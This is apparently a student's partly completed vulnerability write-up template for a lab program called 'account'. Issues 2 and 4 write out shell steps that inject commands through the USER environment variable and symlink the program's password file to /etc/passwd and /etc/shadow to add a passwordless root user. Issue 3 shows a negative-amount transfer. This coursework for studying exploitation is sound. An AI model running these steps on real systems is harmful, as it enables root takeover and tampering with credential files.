---------------------------------------------------------------------
                              ISSUE 0:


--------------------------------------------------------------------
                              ISSUE 1
Vulnerability: Describe where the code is vulnerable,
and what the issue is.

Exploit a: Outline a specific exploit for the above vulnerability. 
The exploit should be found in exploits/e1a

Impact a: Outline the impact of the exploit, including why it is C/I or A.

Exploit b: Found in e1b
Impact b:

Exploit c: 
Impact c

Exploit d: 
Impact d:

...

--------------------------------------------------------------------
                              ISSUE 2
Vulnerability: Usernames are identified through the USER environment variable. This is easy to impersonate since it can be changed from the shell
If the password is compromised, it is trivial for a hacker to impersonate the user to gain control of the account.
The hack can set USER to run malicious code when the program reports on the account. 

$USER="; chmod -R 4777 ."
#./account ''
$mv passwords passwords.BAK
$ln -s /etc/passwd passwords
$USER="; chown root:root passwords"
$./account ''
$USER="froot:x:0:0:/root:/bin/bash"
$./account ''
$rm passwords
$ln /etc/shadow passwords
$USER="froot::::::::"
$./account ''
restart the VM

Since
Exploit a: 
Impact a:

Exploit b: 
Impact b:

Exploit c: 
Impact c

Exploit d: 
Impact d:

...

--------------------------------------------------------------------
                              ISSUE 3
Vulnerability: By using negative number (using the minus "-" sign) but not by using integer overflow.

$USER=num1
$./account pw1
$USER=num2
$./account pw2
$./account pw2 num1 -100

There are also no lower limits on accounts, people can take far more money than is in the account.

Exploit a: 
Impact a:

Exploit b: 
Impact b:

Exploit c: 
Impact c

Exploit d: 
Impact d:

...

--------------------------------------------------------------------
                              ISSUE 4 
Vulnerability: If /vulnerable/passwords is a symbolic link, then the username and password can be written to the linked file. The hacker could even create a password backup beforehand then add the user/pw to the backup file. This way the hacker gains the info but the user thinks that everything is running as usual since their account is setup and usable. 

$mv /vulnerable/passwords /vulnerable/passwords.BAK
$ln -s ps passwords
$touch ps
$./account pw
$cat ps

Exploit a: 
Impact a:

This could also be used to create new root users:
$mv /vulnerable/passwords /vulnerable/passwords.BAK
$ln -s /etc/passwd passwords
$USER=froot:x:0:0:froot:/root:/bin/bash
$./account $USER
$USER=froot::::::::
$unlink passwords
$ln -s /etc/shadow passwords

MAYBE
$USER="; adduser -u 0 froot"

Exploit b: 
Impact b:

Exploit c: 
Impact c

Exploit d: 
Impact d:

...

--------------------------------------------------------------------
                              ISSUE 5 
Vulnerability:

Exploit a: 
Impact a:

Exploit b: 
Impact b:

Exploit c: 
Impact c

Exploit d: 
Impact d:

...

--------------------------------------------------------------------

				.
				.
				.
